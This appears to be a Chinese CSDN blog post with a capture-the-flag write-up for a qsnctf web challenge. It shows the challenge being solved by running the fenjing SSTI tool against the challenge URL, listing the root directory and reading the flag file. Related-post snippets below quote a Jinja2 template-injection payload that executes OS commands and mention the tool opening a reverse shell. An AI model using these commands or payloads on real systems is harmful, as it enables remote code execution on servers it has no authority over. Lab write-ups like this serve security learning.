WEB SSTI(qsnctf)

重开开挂

已于 2023-12-07 19:06:20 修改

阅读量909

点赞数 11

分类专栏： ctf web 工具文章标签： web

于 2023-11-30 14:52:17 首次发布

本文链接：https://blog.csdn.net/2301_76718200/article/details/134712490

版权

ctf 同时被 3 个专栏收录

9 篇文章 1 订阅

订阅专栏

web

2 篇文章 0 订阅

订阅专栏

工具

2 篇文章 0 订阅

订阅专栏

1.题目描述

2.解题思路

开启环境访问

看标题发现是SSTI模板注入使用今天刚学的fenjing工具自动化SSTI模板注入

工具下载教程网址：fenjing(焚靖)——jinja2 SSTI一把梭 - yixinBC's blog

使用pip下载

pip install fenjing

python -m fenjing scan --url 'http://xxx/'#目标网址

以下是我已经安装好了

pip install fenjing #安装fenjing工具

进行自动化SSTI注入

python3 -m fenjing scan --url http://81bb8ce6-6182-4515-a721-c458f791dfc6.challenge.qsnctf.com:8081/

ls /

查看根目录下有什么

发现f1ag，查看

cat /f1ag

flag为

qsnctf{bd686e12-ac15-4d05-9c1d-3c19f9c3a629}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

重开开挂

关注关注

11
点赞
踩
11

收藏

觉得还不错? 一键收藏
2
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

【网络安全 | CTF】一文带你了解SSTI漏洞 + Web_python_template_injection解题详析

等风来

05-28

5749

2.命令执行注入：攻击者在应用程序中的命令执行语句中注入模板代码，从而执行任意系统命令，获取系统权限，对系统进行攻击等。3.变量渲染注入：攻击者在应用程序中的变量渲染语句中注入模板代码，从而影响页面的输出，导致代码执行或信息泄漏等问题。在 Python 3 中，当对一个未导入的模块（如 os 模块）执行 eval() 函数时，linecache 模块会发出一个警告，可利用这个警告来读取敏感信息。1.条件语句注入：攻击者在应用程序中的条件语句中注入模板代码，从而控制条件判断的分支，导致程序的逻辑错误。

qsnctf -web 第五届浙江省大学生网络与信息安全竞赛吃豆人

weixin_68123535的博客

03-30

243

qsnctf-web 第五届浙江省大学生网络与信息安全竞赛糖豆人WP

2 条评论您还未登录，请先登录后发表或查看评论

qsnctf easy_web wp

arcuied

11-10

630

qsnctf easy_web wp

qsnctf

2301_79678604的博客

12-12

433

下载完安装包后，用kali虚拟机打开，解压之后直接利用strings口令。得到一串，之后通过查找flag得到flag。

qsnctf 帝国CMS01 wp

arcuied

11-11

557

qsnctf 帝国CMS01 wp

[SSTI自动化工具]Fenjing安装说明

m0_61155226的博客

07-11

5073

SSTI自动化工具

web安全-SSTI模板注入漏洞

weixin_61956136的博客

07-31

3766

web安全-SSTI模板注入漏洞

攻防世界easy_web之SSTI注入

m0_66935689的博客

07-29

311

昨天不是放假了嘛想着做几道题的刚好碰到个文件上传的条件竞争整半天头都整大了，网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它题把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。

fenjing工具，ssti

12-17

标题中的“fenjing工具，ssti”指的是Fenjing，一个可能用于安全测试或Web应用漏洞扫描的工具，而“ssti”则是Server-Side Template Injection（服务器端模板注入）的缩写，这是一种常见的Web应用程序安全漏洞。...

全国大学生信息安全竞赛决赛web4，SSTI+TensorFlow模型.zip

10-23

SSTI是一种常见的Web应用漏洞，允许攻击者通过模板引擎注入恶意代码，获取服务器上的敏感信息或者执行服务器端的操作。而TensorFlow是Google开发的一个开源机器学习框架，广泛应用于深度学习、图像识别和自然语言...

SSTI模板注入详细总结及WAF绕过

2301_76690905的博客

11-15

2685

模板引擎是用于Web开发的工具，其作用是将用户界面和业务数据分离。通过模板引擎，我们可以根据特定的格式要求生成文档。使用模板引擎，我们只需要提供用户数据，然后将数据传递给渲染函数，模板引擎会根据提供的数据生成对应的前端HTML页面，最终呈现在用户的浏览器中。

[SSTI自动化工具]Fenjing(焚靖)Windows下载报错及正确安装及实际CTF题目中运用

5fn

07-17

1585

本篇文章旨在说明Windows系统上安装fenjing的报错及解决方案，以及展示两种方法----它的基本终端上的用法，以及flask实现框架如何运用在CTF实战题目上并得到flag。

web题解，基础知识巩固（qsnctf）

Z11762的博客

05-27

946

shell是一个用 C 语言编写的程序，它是用户使用 Linux 的桥梁。Shell 既是一种命令语言，又是一种程序设计语言。Shell 是指一种应用程序，这个应用程序提供了一个界面，用户通过这个界面访问操作系统内核的服务。为什么要学习和使用shell？Shell属于内置的脚本，程序开发的效率非常高，依赖于功能强大的命令可以迅速地完成开发任务（批处理）语法简单，代码写起来比较轻松，简单易学。

【小工具发现系列-1】fenjin（焚靖）

m0_73683234的博客

03-17

2344

之前出了一道常规ssti题目，被人用工具秒了，问人要到之后试了一下，发现确实香（jianjia2的ssti要被秒破了）超长的payload就给打出来了（这是真的香，彻底解放双手+不动脑子）使用scan可以自动的扫描网站，最后反弹一个shell。如果要更详细一点可以查看crack的--help。这里我使用了ssti-lab 的最后的混合过滤。QQ：2912055973 欢迎大家讨论。安装过程有很多，我选择了相对简单的方法。主环境安装焚靖之后，使用方法也很简单。这个小工具就介绍完啦（很香）

SSTI漏洞详解

最新发布

apple_74953689的博客

07-26

1444

SSTI（Server-Side Template Injection）是一种发生在服务器端模板中的漏洞。当应用程序接受用户输入并将其直接传递到模板引擎中进行解析时，如果未对用户输入进行，攻击者可以通过构造来注入模板代码，导致服务器端模板引擎执行恶意代码。more常见的模板有很多，不同模板的语法也不相同，在实际情况我们可以测试判断属于哪一种模板。下面将引用一个简单的例子来说明，假设有一个包含以下代码的Twig模板文件Hello, 49!但是，如果攻击者将。

PWARL CTF and others

NYG694的博客

03-10

943

一个登陆框进去，输入内容后发现url上显示了输入对应的字符，第一反应就是sstl，但输入{{1+2}}发现不行，明显有过滤的一些操作，一开始想着用fenjing一把梭，但梭不出来，后来想着看看黑名单一个个过滤先试试，但记录的几种绕过由于自身对sstl理解有限不知道怎么样语法合适，根据关键词搜索下看看有没有相关例题来参考下，后来发现有类似的过滤config，我想尝试拼接绕过复写字符，但因为它是换成空格就没办法了，再后来看到一个unicode的绕过，我就试了下，发现有回显，我还担心无回显题那就难了，幸好输入。

qsnctf -- 新手的登录

m0_72054784的博客

04-13

536

qsnctf -- 新手的登入

2024 HSCCTF

weixin_45906533的博客

03-11

703

Ten。

SSTI入门详解

E1even的博客

03-15

5715

关于基于flask的SSTI漏洞的阶段学习小结： SSTI的理解： SSTI和SQL注入原理差不多，都是因为对输入的字符串控制不足，把输入的字符串当成命令执行。 SSTI引发的真正原因： render_template渲染函数的问题 render_template渲染函数是什么：就是把HTML涉及的页面与用户数据分离开，这样方便展示和管理。当用户输入自己的数据信息，HTML页面可以根据用户自身的信息来展示页面，因此才有了这个函数的使用。 ...

buu ctf web进阶]ssti

08-23

在buu ctf web进阶中，ssti代表 Side Template Injection，是一种应用程序中的安全漏洞。通过此漏洞，攻击者可以注入恶意代码到服务器端的模板引擎，从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...